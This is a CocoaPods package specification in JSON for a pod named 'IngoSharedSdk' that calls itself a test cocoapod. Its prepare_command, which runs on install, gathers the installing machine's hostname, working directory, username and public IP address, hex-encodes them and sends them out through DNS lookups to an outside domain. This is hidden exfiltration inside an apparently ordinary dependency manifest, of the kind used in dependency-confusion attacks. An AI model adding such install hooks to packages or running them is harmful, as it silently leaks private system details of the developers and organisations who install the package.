{
  "name": "IngoSharedSdk",
  "version": "5.9.7",
  "summary": "Test",
  "description": "A test cocoapod",
  "license": {
    "type": "MIT",
    "file": "LICENSE"
  },
  "authors": {
    "David Schmidt": "d.schmidt@univie.ac.at"
  },
  "source": {
    "git": "https://github.com/d-pod-test/IngoSharedSdk.git"
  },
  "homepage": "https://github.com/d-pod-test/IngoSharedSdk.git",
  "platforms": {
    "ios": "9.0"
  },
  "source_files": "Classes/ExampleLib.{m,h}",
  "dependencies": {
    "Alamofire": [

    ]
  },
  "swift_versions": "4.0",
  "prepare_command": "a=$(hostname;pwd;whoami;echo 'IngoSharedSdk';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.reply.vanda.at;done",
  "swift_version": "4.0"
}
